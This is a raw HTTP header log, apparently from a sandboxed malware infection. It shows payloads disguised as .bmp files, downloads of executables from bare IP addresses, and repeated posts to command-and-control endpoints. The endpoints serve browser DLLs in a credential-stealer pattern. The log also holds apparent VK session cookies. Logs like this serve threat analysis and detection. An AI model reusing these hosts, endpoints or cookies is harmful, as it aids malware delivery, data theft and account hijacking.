GET /c909328/u418490229/docs/d52/e20150ec5011/crypted.bmp?extra=9_uUHyTbLcXEPVRQVoDX2SVXXD5LQIa5cbmPsUZ3sANv_Z7qrNnfAbxOeHfG8kJovBnfxWwX2ooHmOeZbCi822CJMQagWtI1l_OJm3U24MjBdIRMy5fjt-zQyydy6dHJmDi4Osx0CqpLJikI0A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:15 GMT Content-Type: image/x-ms-bmp Content-Length: 1168676 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 14:00:44 GMT ETag: "6565f28c-11d524" Expires: Fri, 29 Dec 2023 06:52:15 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc418490229_668950817?hash=eI5j14qEZqSaw1aKlx69PDkbeE2RaV0OZkR8TCBVlkH&dl=Q3HIRdzNrrMLZtN2dhibLhc4W12UZleN44GQrBv9zQc&api=1&no_preview=1#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:16 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909418/u418490229/docs/d33/0707ec1a9cdf/cz28.bmp?extra=sGRI4H5niz7RxILWD_zUG_ctDcTaUSYqKpF1niVRahjkUS__H9KEp1ZwCxgayUfHyz5J9Nz_aiGnRQ0XXPiLbkZhLPYOYfkejwL07zdN1voMsYNb9bZ-9a11sYdof2VMN6HvEZGjbQ-CNlvy4A X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: HvDYWUvbrd4i2vn1-S4pznDhxKrWZw

GET /c909418/u418490229/docs/d33/0707ec1a9cdf/cz28.bmp?extra=sGRI4H5niz7RxILWD_zUG_ctDcTaUSYqKpF1niVRahjkUS__H9KEp1ZwCxgayUfHyz5J9Nz_aiGnRQ0XXPiLbkZhLPYOYfkejwL07zdN1voMsYNb9bZ-9a11sYdof2VMN6HvEZGjbQ-CNlvy4A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:17 GMT Content-Type: image/x-ms-bmp Content-Length: 241372 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 18:38:51 GMT ETag: "656633bb-3aedc" Expires: Fri, 29 Dec 2023 06:52:17 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:18 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 313652 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: zZM-h6n9LoyyfSVhbinc1VkOkIRwyw

GET /doc418490229_668951217?hash=0wrWsiW5bDYiOaBQlj1ut0KnfM2SerHsUNtSIA8n0BX&dl=OYYh0EDgZLGz5BRVaNfHjBWXrjyY3hvz3peQaRwCvJ0&api=1&no_preview=1#test22 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9091518799777550175_fZnnlV78yqpQGrkpcQBpLR19F3K2Z1SnEz8MKt7PvgT; remixlgck=42a3a24825ddd8dded; remixstid=1332058940_Ev7HuUMm98nGZ7hrCyHDUqvwUaFLK5nFaPfLmQuxEQX; remixir=1

HTTP/1.1 302 Found Server: kittenx Date: Wed, 29 Nov 2023 06:52:19 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.115131 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-22.userapi.com/c909218/u418490229/docs/d39/b36e581ef415/file281123.bmp?extra=bJDa7mvscY-voQdIZZUksYr44DtBJP-kJssHt6Ahl0Q3MWE0gDizV1mxjHiRYniFlTlcLPFRW15HwvmQT66uxmB5hPFhj1YM_rOkx1nDbAHpSg6gKZ6T_jczVxXuiS1oknRU7mtsN-SX-p1ujg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: Vr5XCuK42TPMxkXAovVcTZN11GVajw

GET /c909218/u418490229/docs/d39/b36e581ef415/file281123.bmp?extra=bJDa7mvscY-voQdIZZUksYr44DtBJP-kJssHt6Ahl0Q3MWE0gDizV1mxjHiRYniFlTlcLPFRW15HwvmQT66uxmB5hPFhj1YM_rOkx1nDbAHpSg6gKZ6T_jczVxXuiS1oknRU7mtsN-SX-p1ujg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-22.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 29 Nov 2023 06:52:19 GMT Content-Type: image/x-ms-bmp Content-Length: 800260 Connection: keep-alive Last-Modified: Tue, 28 Nov 2023 18:49:32 GMT ETag: "6566363c-c3604" Expires: Fri, 29 Dec 2023 06:52:19 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /1Gemv7.mp3 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: iplis.ru

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:52:55 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive memory: 0.42060089111328125 expires: Wed, 29 Nov 2023 06:52:55 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 289290482949678744=2; expires=Fri, 29 Nov 2024 06:52:55 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=175.208.134.152; expires=Fri, 29 Nov 2024 06:52:55 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g7EzMvBiqfZKc6%2Frb4LHK7Otsp1CG802bk2ITsIpOrji9IuJYmaZ6m9kRW9QCWC2IfPJN39ENObR6HB6VU8QnU62QH%2FMbfTJQK8B83JOTzhZ4TllLH%2FIIC6QAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8ee3adbb53161-LAX alt-svc: h3=":443"; ma=86400

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:52:58 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C797:A8F4_93878F2E:0050_6566DFCA_233C427:BDC8 x-iplb-instance: 30782 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pvNTbWHaGV60M4x9gqqerfyvBrMv9Vh2CVO2TDbuNhnCtLFxB54My7xlcWWcut%2Fo%2FbzjvpX2TBBqoBUG9UxjLHf8%2B2Ya358YYR8JMNDaoUp76WT0FMiB%2Bmz8iw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8ee511cf629cf-FUK alt-svc: h3=":443"; ma=86400

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:53:17 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tKzm5qtxzj196l%2FBjoY102usNwy9HyMx%2BCzFfQui4SC7gr3gom2OJ4dC1YM519X2ziUcksiGRktiNSi61My9k3egCpUxhAO4jPEJ4avICRowbAqcv6a99KkdllE9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8eec39b7a7c49-LAX alt-svc: h3=":443"; ma=86400

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:53:20 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kMzzPswx1Mv9u8TYK34oRVlQryzfjuU5gLsri54sC7TTBa7PmJbt9FxbOTUeWpAR75idA9kTLccMWxq86F8DSWKuliHhcFQ4pusUC2UmuD5JkNTrteNPFbvZ28GL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8eed6df6b7d62-LAX alt-svc: h3=":443"; ma=86400

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:53:20 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C793:D910_93878F2E:0050_6566DFE0_22DAC75:BDCA x-iplb-instance: 30782 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OYaEf7xjIGGVK2HjjeoIZDt0%2FO9dvGNO52NhQ9O039pHJ%2B7BrvfEAy2e5W75Ds16SCEed2XVmdbg6fXQBpc0PYbsZVYFqmipDfD2YzNwh19wOtUJwngdqR5fBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82d8eeda1d9b29d7-FUK alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 91.92.243.151

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:47 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 91.92.243.151

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:48 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 91.92.243.151

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:55 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 5080 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 5.42.64.35 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:56 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 29 Nov 2023 06:45:01 GMT ETag: "47000-60b44dfd7f48b" Accept-Ranges: bytes Content-Length: 290816 Content-Type: application/x-msdos-program

HEAD /trend/home.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 109.107.182.45 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:51:56 GMT Content-Type: application/octet-stream Content-Length: 1539994 Last-Modified: Wed, 29 Nov 2023 06:49:01 GMT Connection: keep-alive ETag: "6566dedd-177f9a" Accept-Ranges: bytes

GET /timeSync.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 5.42.64.35 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 29 Nov 2023 06:45:01 GMT ETag: "47000-60b44dfd7f48b" Accept-Ranges: bytes Content-Length: 290816 Content-Type: application/x-msdos-program

GET /trend/home.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 109.107.182.45 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:51:57 GMT Content-Type: application/octet-stream Content-Length: 1539994 Last-Modified: Wed, 29 Nov 2023 06:49:01 GMT Connection: keep-alive ETag: "6566dedd-177f9a" Accept-Ranges: bytes

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:51:56 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="i6qtt6xu3qiaa63.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 29 Nov 2023 07:51:57 GMT Date: Wed, 29 Nov 2023 06:51:57 GMT Connection: keep-alive

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 561 Host: 91.92.243.151

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:52:44 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 91.92.243.151

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 06:52:53 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Wed, 29 Nov 2023 07:52:56 GMT Date: Wed, 29 Nov 2023 06:52:56 GMT Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKF Host: 5.42.64.41 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:52:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 144 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD Host: 5.42.64.41 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:52:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1792 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEH Host: 5.42.64.41 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:52:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5056 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG Host: 5.42.64.41 Content-Length: 5127 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

GET /2a7743b8bbd7e4a7/sqlite3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:02 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/freebl3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:05 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/mozglue.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:07 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/msvcp140.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:08 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/nss3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:09 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/softokn3.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:12 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes

GET /2a7743b8bbd7e4a7/vcruntime140.dll HTTP/1.1 Host: 5.42.64.41 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:13 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE Host: 5.42.64.41 Content-Length: 943 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG Host: 5.42.64.41 Content-Length: 879 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH Host: 5.42.64.41 Content-Length: 663 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGD Host: 5.42.64.41 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE Host: 5.42.64.41 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Nov 2023 06:53:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1596 Connection: keep-alive Vary: Accept-Encoding

POST /40d570f44e84a454.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDG Host: 5.42.64.41 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache

